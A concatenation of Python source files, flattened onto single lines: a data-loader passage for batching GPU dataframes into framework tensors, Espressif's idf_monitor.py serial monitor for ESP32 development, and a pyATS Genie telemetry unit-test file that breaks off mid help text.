My gut is that we don't actually necessarily *want*, in general, to be overriding __next__ and __iter__ methods """ # we've never initialized, do that now # need this because tf.keras.Model.fit will # call next() cold if self._workers is None: DataLoader.__iter__(self) # get the first chunks if self._batch_itr is None: self._fetch_chunk() # try to iterate through existing batches try: batch = next(self._batch_itr) except StopIteration: # anticipate any more chunks getting created # if not, raise the StopIteration if not self._working and self._buff.empty: self._workers = None self._batch_itr = None raise # otherwise get the next chunks and return # the first batch self._fetch_chunk() batch = next(self._batch_itr) # if batch[0] is empty but other exist for sub in batch: if sub is not None and len(sub) > 0: self.num_rows_processed += len(sub) break return batch def make_tensors(self, gdf, use_nnz=False): split_idx = self._get_segment_lengths(len(gdf)) # map from big chunk to framework-specific tensors chunks = self._create_tensors(gdf) # if we have any offsets, calculate nnzs up front if len(chunks) == 4: offsets = chunks[-1] if use_nnz: nnzs = offsets[1:] - offsets[:-1] chunks = chunks[:-1] # split them into batches and map to the framework-specific output format batches = [[] for _ in range(len(split_idx))] offset_idx = 0 for chunk in chunks: lists = None if isinstance(chunk, tuple): chunk, lists = chunk if len(split_idx) > 1 and chunk is not None: chunk = self._split_fn(chunk, split_idx) else: chunk = [chunk for _ in split_idx] if lists is not None: num_list_columns = len(lists) # grab the set of offsets and nnzs corresponding to # the list columns from this chunk chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns] if use_nnz: chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns] offset_idx += num_list_columns # split them into batches, including an extra 1 on the offsets # so we know how long the very last element is batch_offsets = self._split_fn(chunk_offsets, split_idx + [1]) if use_nnz and len(split_idx) > 1: batch_nnzs = self._split_fn(chunk_nnzs, split_idx) elif use_nnz: batch_nnzs = [chunk_nnzs] else: batch_nnzs = [None] * (len(batch_offsets) - 1) # group all these indices together and iterate through # them in batches to grab the proper elements from each # values tensor chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs) for n, c in enumerate(chunk): if isinstance(c, tuple): c, off0s, off1s, _nnzs = c offsets_split_idx = [1 for _ in range(num_list_columns)] off0s = self._split_fn(off0s, offsets_split_idx, axis=1) off1s = self._split_fn(off1s, offsets_split_idx, axis=1) if use_nnz: _nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1) # TODO: does this need to be ordereddict? 
batch_lists = {} for k, (column_name, values) in enumerate(lists.items()): off0, off1 = off0s[k], off1s[k] if use_nnz: nnz = _nnzs[k] # need to grab scalars for TF case if len(off0.shape) == 1: start, stop = off0[0], off1[0] elif len(off0.shape) == 2: start, stop = off0[0, 0], off1[0, 0] else: print(off0, off1) raise ValueError value = values[start:stop] index = off0 - start if not use_nnz else nnz batch_lists[column_name] = (value, index) c = (c, batch_lists) batches[n].append(c) return [self._handle_tensors(*batch) for batch in batches] def _get_segment_lengths(self, num_samples): """ Helper function to build indices to pass to <torch|tf>.split functions for breaking up into batches """ num_full_batches = _num_steps(num_samples, self.batch_size) - 1 idx = [self.batch_size for _ in range(num_full_batches)] idx.append(num_samples - num_full_batches * self.batch_size) return idx def _to_sparse_tensor(self, values_offset, column_name): """ Create a sparse representation of the input tensor. values_offset is either a tensor or a tuple of tensor, offset. """ seq_limit = self.sparse_max[column_name] values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset) max_seq_len = self._get_max_seq_len(diff_offsets) if max_seq_len > seq_limit: raise ValueError( "The default sequence length has been configured " + f"to {seq_limit} but the " + f"largest sequence in this batch have {max_seq_len} length" ) return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit) def _to_tensor(self, gdf, dtype=None): """ One of the mandatory functions a child class needs to implement. Maps from a cudf DataFrame to a tensor in the appropriate library, with an optional dtype kwarg to do explicit casting if need be """ raise NotImplementedError def _get_device_ctx(self, dev): """ One of the mandatory functions a child class needs to implement. Maps from a GPU index to a framework context object for placing tensors on specific GPUs """ raise NotImplementedError def _split_fn(self, tensor, idx, axis=0): raise NotImplementedError @property def _LONG_DTYPE(self): raise NotImplementedError @property def _FLOAT32_DTYPE(self): raise NotImplementedError def _separate_list_columns(self, gdf): lists, scalars = [], [] for col in gdf.columns: if _is_list_dtype(gdf[col]): lists.append(col) else: scalars.append(col) return _get_embedding_order(scalars), _get_embedding_order(lists) def _create_tensors(self, gdf): """ Breaks a dataframe down into the relevant categorical, continuous, and label tensors. 
Can be overrideen """ workflow_nodes = (self.cat_names, self.cont_names, self.label_names) dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE) tensors = [] offsets = _make_df(device=self.device) for column_names, dtype in zip(workflow_nodes, dtypes): if len(column_names) == 0: tensors.append(None) continue gdf_i = gdf[column_names] gdf.drop(columns=column_names, inplace=True) scalars, lists = self._separate_list_columns(gdf_i) x = None if scalars: # should always return dict column_name: values, offsets (optional) x = self._to_tensor(gdf_i[scalars], dtype) if lists: list_tensors = OrderedDict() for column_name in lists: column = gdf_i.pop(column_name) leaves, offsets[column_name] = _pull_apart_list(column) list_tensors[column_name] = self._to_tensor(leaves, dtype) x = x, list_tensors tensors.append(x) if not offsets.empty: offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE) if len(offsets_tensor.shape) == 1: offsets_tensor = offsets_tensor[:, None] tensors.append(offsets_tensor) del gdf, offsets return tensors def _handle_tensors(self, cats, conts, labels): X = {} for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]): lists = {} if isinstance(tensor, tuple): tensor, lists = tensor names = [i for i in names if i not in lists] # now add in any scalar tensors if len(names) > 1: tensors = self._tensor_split(tensor, len(names), axis=1) lists.update(zip(names, tensors)) elif len(names) == 1: lists[names[0]] = tensor X.update(lists) for column_name in X: if column_name in self.sparse_names: if column_name not in self.sparse_max: raise ValueError( f"Did not convert {column_name} to sparse due to missing sparse_max entry" ) X[column_name] = self._to_sparse_tensor(X[column_name], column_name) # TODO: use dict for labels as well? # would require output layers to match naming if len(self.label_names) > 1: labels = self._tensor_split(labels, len(self.label_names), axis=1) return X, labels
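# --- Illustrative sketch (standalone; mirrors _num_steps and _get_segment_lengths above) ---
# A chunk of `num_samples` rows is cut into ceil(num_samples / batch_size) pieces, all of
# size batch_size except a possibly smaller final piece. The helper below reproduces that
# arithmetic on plain ints so it can be sanity-checked without building a Dataset.
def _demo_segment_lengths(num_samples, batch_size):
    import math

    num_full_batches = math.ceil(num_samples / batch_size) - 1
    idx = [batch_size] * num_full_batches
    idx.append(num_samples - num_full_batches * batch_size)
    return idx

# e.g. _demo_segment_lengths(10, 4) -> [4, 4, 2]; when drop_last=True the trailing short
# piece is not emitted (see ChunkQueue.chunk_logic and DataLoader.__len__ above).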
idf_monitor.py
#!/usr/bin/env python # # esp-idf serial output monitor tool. Does some helpful things: # - Looks up hex addresses in ELF file with addr2line # - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R) # - Run "make flash" (Ctrl-T Ctrl-F) # - Run "make app-flash" (Ctrl-T Ctrl-A) # - If gdbstub output is detected, gdb is automatically loaded # # Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Contains elements taken from miniterm "Very simple serial terminal" which # is part of pySerial. https://github.com/pyserial/pyserial # (C)2002-2015 Chris Liechti <cliechti@gmx.net> # # Originally released under BSD-3-Clause license. # from __future__ import print_function, division import subprocess import argparse import codecs import re import os try: import queue except ImportError: import Queue as queue import time import sys import serial import serial.tools.miniterm as miniterm import threading import ctypes import types from distutils.version import StrictVersion key_description = miniterm.key_description # Control-key characters CTRL_A = '\x01' CTRL_B = '\x02' CTRL_F = '\x06' CTRL_H = '\x08' CTRL_R = '\x12' CTRL_T = '\x14' CTRL_Y = '\x19' CTRL_P = '\x10' CTRL_RBRACKET = '\x1d' # Ctrl+] # ANSI terminal codes ANSI_RED = '\033[1;31m' ANSI_YELLOW = '\033[0;33m' ANSI_NORMAL = '\033[0m' def color_print(message, color): """ Print a message to stderr with colored highlighting """ sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL)) def yellow_print(message): color_print(message, ANSI_YELLOW) def red_print(message): color_print(message, ANSI_RED) __version__ = "1.0" # Tags for tuples in queues TAG_KEY = 0 TAG_SERIAL = 1 # regex matches an potential PC value (0x4xxxxxxx) MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE) DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-" class StoppableThread(object): """ Provide a Thread-like class which can be 'cancelled' via a subclass-provided cancellation method. Can be started and stopped multiple times. Isn't an instance of type Thread because Python Thread objects can only be run once """ def __init__(self): self._thread = None @property def alive(self): """ Is 'alive' whenever the internal thread object exists """ return self._thread is not None def start(self): if self._thread is None: self._thread = threading.Thread(target=self._run_outer) self._thread.start() def _cancel(self): pass # override to provide cancellation functionality def run(self): pass # override for the main thread behaviour def _run_outer(self): try: self.run() finally: self._thread = None def stop(self): if self._thread is not None: old_thread = self._thread self._thread = None self._cancel() old_thread.join() class ConsoleReader(StoppableThread): """ Read input keys from the console and push them to the queue, until stopped. 
""" def __init__(self, console, event_queue): super(ConsoleReader, self).__init__() self.console = console self.event_queue = event_queue def run(self): self.console.setup() try: while self.alive: try: if os.name == 'nt': # Windows kludge: because the console.cancel() method doesn't # seem to work to unblock getkey() on the Windows implementation. # # So we only call getkey() if we know there's a key waiting for us. import msvcrt while not msvcrt.kbhit() and self.alive: time.sleep(0.1) if not self.alive: break c = self.console.getkey() except KeyboardInterrupt: c = '\x03' if c is not None: self.event_queue.put((TAG_KEY, c), False) finally: self.console.cleanup() def _cancel(self): if os.name == 'posix': # this is the way cancel() is implemented in pyserial 3.3 or newer, # older pyserial (3.1+) has cancellation implemented via 'select', # which does not work when console sends an escape sequence response # # even older pyserial (<3.1) does not have this method # # on Windows there is a different (also hacky) fix, applied above. # # note that TIOCSTI is not implemented in WSL / bash-on-Windows. # TODO: introduce some workaround to make it work there. import fcntl, termios fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0') class SerialReader(StoppableThread): """ Read serial data from the serial port and push to the event queue, until stopped. """ def __init__(self, serial, event_queue): super(SerialReader, self).__init__() self.baud = serial.baudrate self.serial = serial self.event_queue = event_queue if not hasattr(self.serial, 'cancel_read'): # enable timeout for checking alive flag, # if cancel_read not available self.serial.timeout = 0.25 def run(self): if not self.serial.is_open: self.serial.baudrate = self.baud self.serial.rts = True # Force an RTS reset on open self.serial.open() self.serial.rts = False try: while self.alive: data = self.serial.read(self.serial.in_waiting or 1) if len(data): self.event_queue.put((TAG_SERIAL, data), False) finally: self.serial.close() def _cancel(self): if hasattr(self.serial, 'cancel_read'): try: self.serial.cancel_read() except: pass class Monitor(object): """ Monitor application main class. This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this purpose. Main difference is that all event processing happens in the main thread, not the worker threads. 
""" def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"): super(Monitor, self).__init__() self.event_queue = queue.Queue() self.console = miniterm.Console() if os.name == 'nt': sys.stderr = ANSIColorConverter(sys.stderr) self.console.output = ANSIColorConverter(self.console.output) self.console.byte_output = ANSIColorConverter(self.console.byte_output) if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'): # Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above) def getkey_patched(self): c = self.enc_stdin.read(1) if c == unichr(0x7f): c = unichr(8) # map the BS key (which yields DEL) to backspace return c self.console.getkey = types.MethodType(getkey_patched, self.console) self.serial = serial_instance self.console_reader = ConsoleReader(self.console, self.event_queue) self.serial_reader = SerialReader(self.serial, self.event_queue) self.elf_file = elf_file self.make = make self.toolchain_prefix = toolchain_prefix self.menu_key = CTRL_T self.exit_key = CTRL_RBRACKET self.translate_eol = { "CRLF": lambda c: c.replace(b"\n", b"\r\n"), "CR": lambda c: c.replace(b"\n", b"\r"), "LF": lambda c: c.replace(b"\r", b"\n"), }[eol] # internal state self._pressed_menu_key = False self._read_line = b"" self._gdb_buffer = b"" self._output_enabled = True def main_loop(self): self.console_reader.start() self.serial_reader.start() try: while self.console_reader.alive and self.serial_reader.alive: (event_tag, data) = self.event_queue.get() if event_tag == TAG_KEY: self.handle_key(data) elif event_tag == TAG_SERIAL: self.handle_serial_input(data) else: raise RuntimeError("Bad event data %r" % ((event_tag,data),)) finally: try: self.console_reader.stop() self.serial_reader.stop() except: pass sys.stderr.write(ANSI_NORMAL + "\n") def handle_key(self, key): if self._pressed_menu_key: self.handle_menu_key(key) self._pressed_menu_key = False elif key == self.menu_key: self._pressed_menu_key = True elif key == self.exit_key: self.console_reader.stop() self.serial_reader.stop() else: try: key = self.translate_eol(key) self.serial.write(codecs.encode(key)) except serial.SerialException: pass # this shouldn't happen, but sometimes port has closed in serial thread except UnicodeEncodeError: pass # this can happen if a non-ascii character was passed, ignoring def handle_serial_input(self, data): # this may need to be made more efficient, as it pushes out a byte # at a time to the console for b in data: if self._output_enabled: self.console.write_bytes(b) if b == b'\n': # end of line self.handle_serial_input_line(self._read_line.strip()) self._read_line = b"" else: self._read_line += b self.check_gdbstub_trigger(b) def handle_serial_input_line(self, line): for m in re.finditer(MATCH_PCADDR, line): self.lookup_pc_address(m.group()) def handle_menu_key(self, c): if c == self.exit_key or c == self.menu_key: # send verbatim self.serial.write(codecs.encode(c)) elif c in [ CTRL_H, 'h', 'H', '?' 
]: red_print(self.get_help_text()) elif c == CTRL_R: # Reset device via RTS self.serial.setRTS(True) time.sleep(0.2) self.serial.setRTS(False) self.output_enable(True) elif c == CTRL_F: # Recompile & upload self.run_make("flash") elif c == CTRL_A: # Recompile & upload app only self.run_make("app-flash") elif c == CTRL_Y: # Toggle output display self.output_toggle() elif c == CTRL_P: yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart") # to fast trigger pause without press menu key self.serial.setDTR(False) # IO0=HIGH self.serial.setRTS(True) # EN=LOW, chip in reset time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1 self.serial.setDTR(True) # IO0=LOW self.serial.setRTS(False) # EN=HIGH, chip out of reset time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05 self.serial.setDTR(False) # IO0=HIGH, done else: red_print('--- unknown menu character {} --'.format(key_description(c))) def get_help_text(self): return """ --- idf_monitor ({version}) - ESP-IDF monitor tool --- based on miniterm from pySerial --- --- {exit:8} Exit program --- {menu:8} Menu escape key, followed by: --- Menu keys: --- {menu:7} Send the menu character itself to remote --- {exit:7} Send the exit character itself to remote --- {reset:7} Reset target board via RTS line --- {make:7} Run 'make flash' to build & flash --- {appmake:7} Run 'make app-flash to build & flash app --- {output:7} Toggle output display --- {pause:7} Reset target into bootloader to pause app via RTS line """.format(version=__version__, exit=key_description(self.exit_key), menu=key_description(self.menu_key), reset=key_description(CTRL_R), make=key_description(CTRL_F), appmake=key_description(CTRL_A), output=key_description(CTRL_Y), pause=key_description(CTRL_P), ) def __enter__(self): """ Use 'with self' to temporarily disable monitoring behaviour """ self.serial_reader.stop() self.console_reader.stop() def __exit__(self, *args, **kwargs): """ Use 'with self' to temporarily disable monitoring behaviour """ self.console_reader.start() self.serial_reader.start() def prompt_next_action(self, reason): self.console.setup() # set up console to trap input characters try: red_print(""" --- {} --- Press {} to exit monitor. --- Press {} to run 'make flash'. --- Press {} to run 'make app-flash'. --- Press any other key to resume monitor (resets target).""".format(reason, key_description(self.exit_key), key_description(CTRL_F), key_description(CTRL_A))) k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc. while k == CTRL_T: k = self.console.getkey() finally: self.console.cleanup() if k == self.exit_key: self.event_queue.put((TAG_KEY, k)) elif k in [ CTRL_F, CTRL_A ]: self.event_queue.put((TAG_KEY, self.menu_key)) self.event_queue.put((TAG_KEY, k)) def run_make(self, target): with self: yellow_print("Running make %s..." % target) p = subprocess.Popen([self.make, target ]) try: p.wait() except KeyboardInterrupt: p.wait() if p.returncode != 0: self.prompt_next_action("Build failed") else: self.output_enable(True) def lookup_pc_address(self, pc_addr): translation = subprocess.check_output( ["%saddr2line" % self.toolchain_prefix, "-pfiaC", "-e", self.elf_file, pc_addr], cwd=".") if not "?? 
??:0" in translation: yellow_print(translation) def check_gdbstub_trigger(self, c): self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break if m is not None: try: chsum = sum(ord(p) for p in m.group(1)) & 0xFF calc_chsum = int(m.group(2), 16) except ValueError: return # payload wasn't valid hex digits if chsum == calc_chsum: self.run_gdb() else: red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum)) def run_gdb(self): with self: # disable console control sys.stderr.write(ANSI_NORMAL) try: process = subprocess.Popen(["%sgdb" % self.toolchain_prefix, "-ex", "set serial baud %d" % self.serial.baudrate, "-ex", "target remote %s" % self.serial.port, "-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second self.elf_file], cwd=".") process.wait() except KeyboardInterrupt: pass # happens on Windows, maybe other OSes finally: try: # on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns... process.terminate() except: pass try: # also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode subprocess.call(["stty", "sane"]) except: pass # don't care if there's no stty, we tried... self.prompt_next_action("gdb exited") def output_enable(self, enable): self._output_enabled = enable def output_toggle(self): self._output_enabled = not self._output_enabled yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled)) def main(): parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf") parser.add_argument( '--port', '-p', help='Serial port device', default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0') ) parser.add_argument( '--baud', '-b', help='Serial port baud rate', type=int, default=os.environ.get('MONITOR_BAUD', 115200)) parser.add_argument( '--make', '-m', help='Command to run make', type=str, default='make') parser.add_argument( '--toolchain-prefix', help="Triplet prefix to add before cross-toolchain names", default=DEFAULT_TOOLCHAIN_PREFIX) parser.add_argument( "--eol", choices=['CR', 'LF', 'CRLF'], type=lambda c: c.upper(), help="End of line to use when sending to the serial port", default='CR') parser.add_argument( 'elf_file', help='ELF file of application', type=argparse.FileType('rb')) args = parser.parse_args() if args.port.startswith("/dev/tty."): args.port = args.port.replace("/dev/tty.", "/dev/cu.") yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.") yellow_print("--- Using %s instead..." 
% args.port) serial_instance = serial.serial_for_url(args.port, args.baud, do_not_open=True) serial_instance.dtr = False serial_instance.rts = False args.elf_file.close() # don't need this as a file # remove the parallel jobserver arguments from MAKEFLAGS, as any # parent make is only running 1 job (monitor), so we can re-spawn # all of the child makes we need (the -j argument remains part of # MAKEFLAGS) try: makeflags = os.environ["MAKEFLAGS"] makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags) os.environ["MAKEFLAGS"] = makeflags except KeyError: pass # not running a make jobserver monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol) yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format( p=serial_instance)) yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format( key_description(monitor.exit_key), key_description(monitor.menu_key), key_description(monitor.menu_key), key_description(CTRL_H))) monitor.main_loop() if os.name == 'nt': # Windows console stuff STD_OUTPUT_HANDLE = -11 STD_ERROR_HANDLE = -12 # wincon.h values FOREGROUND_INTENSITY = 8 FOREGROUND_GREY = 7 # matches the ANSI color change sequences that IDF sends RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m') # list mapping the 8 ANSI colors (the indexes) to Windows Console colors ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ] GetStdHandle = ctypes.windll.kernel32.GetStdHandle SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute class ANSIColorConverter(object): """Class to wrap a file-like output stream, intercept ANSI color codes, and convert them into calls to Windows SetConsoleTextAttribute. Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses. Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output. """ def __init__(self, output): self.output = output self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE) self.matched = b'' def _output_write(self, data): try: self.output.write(data) except IOError: # Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws # an exception (however, the character is still written to the screen) # Ref https://github.com/espressif/esp-idf/issues/1136 pass def write(self, data): for b in data: l = len(self.matched) if b == '\033': # ESC self.matched = b elif (l == 1 and b == '[') or (1 < l < 7): self.matched += b if self.matched == ANSI_NORMAL: # reset console SetConsoleTextAttribute(self.handle, FOREGROUND_GREY) self.matched = b'' elif len(self.matched) == 7: # could be an ANSI sequence m = re.match(RE_ANSI_COLOR, self.matched) if m is not None: color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))] if m.group(1) == b'1': color |= FOREGROUND_INTENSITY SetConsoleTextAttribute(self.handle, color) else: self._output_write(self.matched) # not an ANSI color code, display verbatim self.matched = b'' else: self._output_write(b) self.matched = b'' def flush(self): self.output.flush() if __name__ == "__main__": main()
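# --- Illustrative sketch (standalone; not called by the monitor) ---
# check_gdbstub_trigger() above watches the serial stream for a GDB remote-protocol stop
# packet of the form $T<nn>#<checksum>, where the checksum is the sum of the payload bytes
# modulo 256, written as two hex digits. The helper below performs the same validation on
# a sample packet: ord('T') + ord('0') + ord('5') = 0x54 + 0x30 + 0x35 = 0xB9.
def _demo_gdb_checksum(packet=b"$T05#b9"):
    import re

    m = re.match(b"\\$(T..)#(..)", packet)
    if m is None:
        return False
    calculated = sum(bytearray(m.group(1))) & 0xFF  # sum of payload bytes, modulo 256
    received = int(m.group(2), 16)
    return calculated == received  # True for the sample packet above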
test_telemetry.py
#!/usr/bin/env python # Python import os import sys import yaml import time import signal import unittest from shutil import rmtree from tempfile import mkdtemp from multiprocessing import Process from collections import OrderedDict from unittest.mock import Mock, patch, call, PropertyMock # ATS from pyats.topology import loader from pyats.aetest import CommonCleanup from pyats.datastructures import AttrDict from pyats.aetest import container from pyats.aetest.signals import AEtestPassxSignal from pyats.connections.bases import BaseConnection from pyats.results import Passed, Passx # GenieTelemetry from genie.telemetry.parser import Parser from genie.telemetry.main import GenieTelemetry from genie.telemetry import BasePlugin, Manager, TimedManager, processors class MockConnection(BaseConnection): connected = False def connect(self): self.connected = True def disconnect(self): self.connected = False def __getattr__(self, *args, **kwargs): return Mock() def parse(self, *args, **kwargs): return "MOCKED_PARSER" def learn(self, *args, **kwargs): pass def execute(self, *args, **kwargs): return 'MOCKED_EXECUTION' def __init__(self, device, alias=None, via=None, **kwargs): if alias is None: alias = device.name super().__init__(device = device, alias = alias, via = via, **kwargs) class MockTestScript(object): pass class MockSection(object): parameters = {} result = Passed message = None def passx(self, message): self.result = Passx self.message = message def __str__(self): return 'MockSection' class MockCleanup(CommonCleanup): pass class GenieTelemetryTestcase(unittest.TestCase): def setUp(self): global testbed, testbed_file, config_file, config_file2 global runinfo_dir, script, section, clean_up directory = os.path.dirname(os.path.abspath(__file__)) testbed_file = os.path.join(directory, 'scripts', 'testbed.yaml') config_file = os.path.join(directory, 'scripts', 'config.yaml') config_file2 = os.path.join(directory, 'scripts', 'config2.yaml') testbed = loader.load(testbed_file) runinfo_dir = mkdtemp(prefix='runinfo_dir') script = MockTestScript() section = MockSection() clean_up = MockCleanup() section.parent = script clean_up.parent = script def tearDown(self): rmtree(runinfo_dir) def test_base(self): with self.assertLogs('', level='INFO') as cm: processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "'--genietelemetry' argument is not provided." 
self.assertTrue(msg in output) with self.assertLogs('', level='INFO') as cm: sys.argv = ['easypy', '--genietelemetry', config_file] processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "no testbed supplied" self.assertTrue(msg in output) def test_passx_processor(self): [d.connect() for d in testbed.devices.values()] sys.argv = ['easypy', '--genietelemetry', config_file] with self.assertLogs('', level='INFO') as cm: # processors.runtime = Mock(side_effect=runtime) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "failed to load abstration on device P1 for plugin mockplugin" self.assertTrue(msg in output) self.assertEqual(section.result, Passx) self.assertIsNotNone(section.message) msg = ("'genie.telemetry' caught anomalies: \n" "genie.telemetry.tests.scripts.mockplugin\n\tP1\n\t\tpartial") self.assertEqual(msg, section.message) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir with self.assertRaises(AEtestPassxSignal) as cm: processors.genie_telemetry_processor(clean_up) self.assertEqual(cm.exception.reason, msg) fname = os.path.join(runinfo_dir, 'telemetry.yaml') self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as tempfile: content = yaml.safe_load(tempfile) expected = { 'common cleanup': { 'genie.telemetry.tests.scripts.mockplugin': { 'P1': {'status': 'Partial'}}, 'Crash Dumps Plugin': { 'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': { 'P1': {'status': 'Ok'}}}, 'MockSection': { 'genie.telemetry.tests.scripts.mockplugin': { 'P1': {'status': 'Partial'}}, 'Crash Dumps Plugin': { 'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': { 'P1': {'status': 'Ok',}}} } self.assertEqual(sorted(content.keys()), sorted(expected.keys())) for key, value in expected.items(): self.assertTrue(key in content) for plugin, devices in value.items(): content_devices = content[key].get(plugin, None) self.assertIsNotNone(content_devices) self.assertEqual(devices['P1']['status'], content_devices['P1']['status']) def test_pass_processor(self): [d.connect() for d in testbed.devices.values()] sys.argv = ['easypy', '--genietelemetry', config_file2] with self.assertLogs('', level='INFO') as cm: self.assertTrue(section.result) self.assertIsNone(section.message) # processors.runtime = Mock(side_effect=runtime) with patch.object(processors, 'runtime', new_callable=PropertyMock) as mock_runtime: mock_runtime.testbed = testbed mock_runtime.runinfo = AttrDict() mock_runtime.runinfo.runinfo_dir = runinfo_dir processors.genie_telemetry_processor(section) output = '\n'.join(cm.output) msg = "failed to load abstration on device P1 for plugin mockplugin" self.assertFalse(msg in output) self.assertTrue(section.result) self.assertIsNone(section.message) def _test_main(self): sys.argv = ['genietelemetry', testbed_file, '-configuration', config_file2, '-runinfo_dir', runinfo_dir, '-uid', 'mock', '-no_mail'] genie_telemetry = GenieTelemetry() p = Process(target=genie_telemetry.main) p.start() # wait for first interval time.sleep(15) # double ctrl+c event os.kill(p.pid, signal.SIGINT) time.sleep(1) os.kill(p.pid, signal.SIGINT) time.sleep(1) self.assertFalse(p.is_alive()) fname = os.path.join(runinfo_dir, 'telemetry.yaml') 
self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as tempfile: results = yaml.safe_load(tempfile) expected = {'Crash Dumps Plugin': {'P1': {'status': 'Ok'}}, 'Traceback Check Plugin': {'P1': {'status': 'Ok'}}} content = {} for r in results.values(): content.update(r) for plugin, devices in expected.items(): content_devices = content.get(plugin, None) self.assertIsNotNone(content_devices) self.assertEqual(devices['P1']['status'], content_devices['P1']['status']) fname = os.path.join(runinfo_dir, 'telemetry.log') self.assertTrue(os.path.isfile(fname)) with open(fname, 'r') as logfile: logfiles = logfile.readlines() content = [x.strip() for x in logfiles] logs = ['Loading genie.telemetry Configuration', 'Loading genie.telemetry Plugins', 'Initializing genie.telemetry Plugins for Testbed Devices', 'Initializing plugins for P1', ' - loading plugin', ' - loading plugin', 'Starting TimedManager ...', 'Setting up connection to device (P1)', None, 'Telemetry Task', None, None, 'Crash Dumps Plugin', None, '- device (P1)', 'Status : Ok', ' - Result :', 'No cores found!', None, 'Telemetry Task', None, None, 'Traceback Check Plugin', None, '- device (P1)', 'Status : Ok', ' - Result :', '***** No patterns matched *****', 'Ctrl+C keyboard interrupt detected...', 'Aborting run & cleaning up as fast as possible...', None, 'Monitoring Report'] for expected, log in zip(logs, content[:len(logs)]): if not expected: continue self.assertTrue(expected in log) def test_help(self): sys.argv = ['genietelemetry', '-h'] parser = Parser() help_output = parser.format_help() expected = ''' usage: genietelemetry [TESTBEDFILE] [-h] [-loglevel] [-configuration FILE] [-uid UID] [-runinfo_dir RUNINFO_DIR] [-callback_notify CALLBACK_NOTIFY] [-timeout TIMEOUT] [-connection_timeout CONNECTION_TIMEOUT] [-no_mail] [-no_notify] [-mailto] [-mail_subject] [-notify_subject] [-email_domain] [-smtp_host] [-smtp_port] [-smtp_username] [-smtp_password] genie telemetry command line arguments. Example ------- genietelemetry /path/to/testbed.yaml -------------------------------------------------------------------------------- Positional Arguments: TESTBEDFILE testbed file to be monitored Help: -h, -help show this help message and exit Logging: -loglevel genie telemetry logging level eg: -loglevel="INFO" Configuration: -configuration FILE configuration yaml file for plugins and settings -uid UID Specify monitoring job uid -runinfo_dir RUNINFO_DIR Specify directory to store execution logs -callback_notify CALLBACK_NOTIFY Specify Liveview callback notify URI -timeout TIMEOUT Specify plugin maximum execution 